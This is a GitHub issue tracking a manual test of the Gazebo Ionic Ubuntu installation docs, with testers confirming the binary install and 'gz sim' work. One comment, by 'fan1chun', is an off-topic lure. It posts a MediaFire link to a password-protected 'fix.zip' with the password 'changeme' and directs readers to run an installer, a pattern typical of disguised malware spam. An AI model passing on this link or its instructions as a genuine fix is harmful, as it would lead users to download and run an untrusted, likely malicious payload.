gazebosim/gazebo_test_cases #1702: docs: install_ubuntu

azeey-test, 2024-08-29:
## Configuration

* buildType: Binary
* os: Ubuntu Noble

## Links

* [Live](https://gazebosim.org/docs/ionic/install_ubuntu)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/install_ubuntu.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

fan1chun, 2024-08-29:
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

bperseghetti, 2024-08-29:
I'm available to test.

utkuesen, 2024-09-05:
I tested it and installation worked.
I also tested to run "gz sim" command then open an example project which is "NAO Joint Control". It was also working.

bperseghetti, 2024-09-05:
Works on a cleanly installed native 24.04 system as well, we just need to remember to remove this line https://github.com/gazebosim/docs/blob/3e075cdf75464d1610c38ba069a3a8970e78e720/ionic/install_ubuntu.md?plain=1#L20 once Ionic is released.

closed 2024-09-05 by azeey